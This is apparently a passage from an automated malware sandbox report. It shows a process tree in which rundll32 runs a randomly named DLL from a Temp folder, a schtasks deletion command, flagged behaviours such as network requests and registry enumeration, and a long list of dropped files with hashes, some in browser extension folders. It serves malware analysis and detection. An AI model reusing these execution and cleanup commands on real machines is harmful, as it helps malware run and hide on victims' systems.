C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qUDHiGcWmqaEfibr\QCEMiQxb\PPZmDzM.dll",#1 /Rjsite_idJQh 3851181⤵PID:1084
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qUDHiGcWmqaEfibr\QCEMiQxb\PPZmDzM.dll",#1 /Rjsite_idJQh 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1088 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iQotdfZjyOUckLeEG"3⤵PID:3788
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50befceaa02ad3910dd5fbebd45ebbb20
SHA1314e88bcfdbdfcc21acf9b3b272add02bedb6a52
SHA25657785ce5010866228ea19b30a7e46d376f4b2806b7cd35cdc251c742ed9a4222
SHA512d9960c8caee341aecc44f648dc187c70fce9f7b5ff4a94cf030501cd2496d4a72eefc5151b54e1bd646c1b7886de7c90dc96242c166c6bd6dd6cdb5081dfab98
-
Filesize
2KB
MD5b9c1c20fb292042d72a4916f64783d66
SHA1595ce037e5ef5a97413f1267926d2c4c7431b852
SHA2561a8a39798af92ccb584f49ac4ff7c7e15972e8efa435942a9796e2bf8b680826
SHA512cb93b338ed7677a3ecdf983b6e57699f8435b6346b18d7ad45293a75af2572ed37d28df23d989d69f7eae7d09932faa059224723933290d1bf0dd21106525917
-
Filesize
2KB
MD5943296c3bdf18fd81d49c6dcb7c5381f
SHA159f79a349adc3a439f89a23f9701e2c9c9a928a4
SHA2564819a1f9262f33eb427f73fcf222564e59836b9b6eaa77d8d71712fbd50b3f6f
SHA512b1e50425e4e5c22d541d633bded96d676a68cb1c13e349118c92ad250f4cb233674162f67b5f9610c8c94e0ec64d5c2c90109322c6ff311d7b0ed09f2a9109f0
-
Filesize
2KB
MD5fcce75d9d11c59ee6b84c4c4e18e9321
SHA1a6b0fc52b04715945095af578905855fb759e9ae
SHA2560a3b3cc564b1af11b6459d387fcea2b82c3f92e1a26760e99251a4eaeb1855f5
SHA512915d108492669bdc7b262f06edf5354cb377f8f40f3912b34df9e4f99eea1bef3e1e0505ce5d80f79ddc2c46dbd637b236d1cba070c44d3716d86965dfd5996e
-
Filesize
2.5MB
MD530229711fd75f00d8c0b185e2f5bb06a
SHA1b607437ca18619660dc0f4012799d0f858298f4c
SHA25693c9cbaede7ab90b72be42c3e97abdbc35f704a55754d51ababa7a1d3bf74c17
SHA5123e80a988905832e7452ad9d8c7c243e6b8ae07bf4a5dd101b511f130839e1340b2ecea261c86317df7ff557a6a48a3350bdd644702604d8c357f9c3f642fd93c
-
Filesize
2KB
MD5542398ee0b81fe7ab68342eedffab3b6
SHA183ea21df9dcf2b6717cf253fcd45ab7d88a63d94
SHA256cb9d40dee198ddc9e0a169fed9c45d84caf8860f606eee1c987826f2c9e5991a
SHA512884f39f461a85e9b70e78410a42dbfab34873ff41469a4b4d15ca1f2b9f0f3e9acc8f303f5c5600e4087c5dc430edc8139d5c45b9bb4344027b5027c2f5e8382
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD52fdae1f19c7d95fb0d7ca717803a8d38
SHA14596bff7ed1fe47d56f1c56ccff26ee526ae56b4
SHA2560f3c3a956e720a2470fb2a617b2b657309db65f16144d85fe777129447bbcb73
SHA5129af05d6f2d33cdb837d6d0a58efe9dfe30819e3c5e82149e25af6ec7852cb522e89582afc72f3051ed3a2346c839120e281b7a4aad529c3f1a906e5b6b5d9c29
-
Filesize
34KB
MD5320ff350a2882cc3ca6e2dc8db2953d7
SHA108afbdb396e24279055debb88e4dc86e9e76f959
SHA256b25cd0db30677827f4d5bf8d2177eab30360a410edfc99ecbf8894569115d21a
SHA5121627df6c4dc12a8d770469652be842ab8d609716130f34718fd92a43fdab0f7b17339fa5e9c0c3d7470366b60cffd3e001720e51a46760c2fa1b9595e8dbed71
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD5796f7e44ae9878f28d33ad344fe90f57
SHA111c172b25c6f2ac253ed19938c4d3481844c2dd7
SHA2567dfff2f0d5c7ad8d9b0762129d463c27edbd902684be00cde9f18c9e79895436
SHA51250be4d1c4b3de34fa800f5da22ca96bd76c13bac427ce3e5e312007453bae788597cfe5cd18564989bc8a5909f6cdd90450290116dd4d1ff71edfd1aa60fced4
-
Filesize
11KB
MD59bd01a448520f2a0b8e0eb5c098891d9
SHA1ab464fc8d708b6f9019e8aaf9ab1ec28d16d3586
SHA256d324bfda017771598243ca343386f5d6779dba5fc115fca37172507d11c0689c
SHA5125a07b97a8037617a312f8c616d718c91aa550f679442e9d7b886ece5dcbcac78aa89345e31aae838e3c8a68cef3d383a42191777f59d344abf8d5d80430eb3a1
-
Filesize
6.7MB
MD5f92261d3923e908962715be7cc5266f8
SHA19e6b2bc2ca098a295b666d965bb1f22af4a61689
SHA25625dcde71da97815f0e396b7788a6c9fb3dfd96b00d02549c8418785f457e8940
SHA51253bff9120384349ced137b458b2314ac877902b5c71c983616c1841daf0c9b46d6167362d2b85c90370d87ef7968e6c31937a64033ed4999f69c6a1a9fe49795
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5695ed56309d40b811f54a77a9567d36d
SHA1be66e39a6414c87ae6d7554d79631bffa865550f
SHA256c6f031f1aa1fb004814ba7c7ce6659a95bd7f17eb557e77bbceb2dd6aeafed5a
SHA512b58d81efdb2fa72ea8e9c3f6d6d9d469c1d4b716f9491962713d66f7d42757a7fd32b0ea6b3d8daa204ab2592dca8e72eb5d3ce2daeaf1a16011f5c3d3831a49
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD528854213fdaa59751b2b4cfe772289cc
SHA1fa7058052780f4b856dc2d56b88163ed55deb6ab
SHA2567c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915
SHA5121e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD56f5ec0fab6de606354e002a8ba198bba
SHA181a56a488a67c5af57cc4c5c8affc9806172f72d
SHA2562460c5f592e994212d168ad692b60ec9cc1ceb1bcb5fb08ca8f768c25131aca3
SHA51278459206af3291d7e19c2375cc2879a2b36e968b3b4b2cf8ee837792d70b49ec5125ae43b5728f670ce8d7ad9088ce3d5822b1ad50adf33d97e6630f4551c881
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD505a39a2333a5ddf3e5beeccb13565ba5
SHA105d7fb9752d5bcc2699a3f8b348796702f4c201f
SHA25697cec49e9a805fa98d4a35bc1686d4238e6ef79ab417dafa8d53fad1e62d8774
SHA512b3aa0bbef00f0ee38dc53dad7591336d483083e344f6a05ebb9d5499f5df2d65993743fed1c0cb760ba921eecf8e2e0e16a457241b9026ece1e3b5e10d6c850c
-
Filesize
6.4MB
MD55e03480946ca905daf89cf05944c0543
SHA1f5a7aac6b1ccbd62cf18a9b971d9cfc0758d25ce
SHA2567e4fb1b0dfdb47320f10dcb491a013360d05b17cbf3fba392e9606c57b80ff99
SHA512dfd5a44b2d3915caa8dd65bc18276e3b00b3eba3464ce1aa403857947f67963bf038bd4ba4dc7511997765ca261b611482c6475f1e8b885ca362234fc52eae71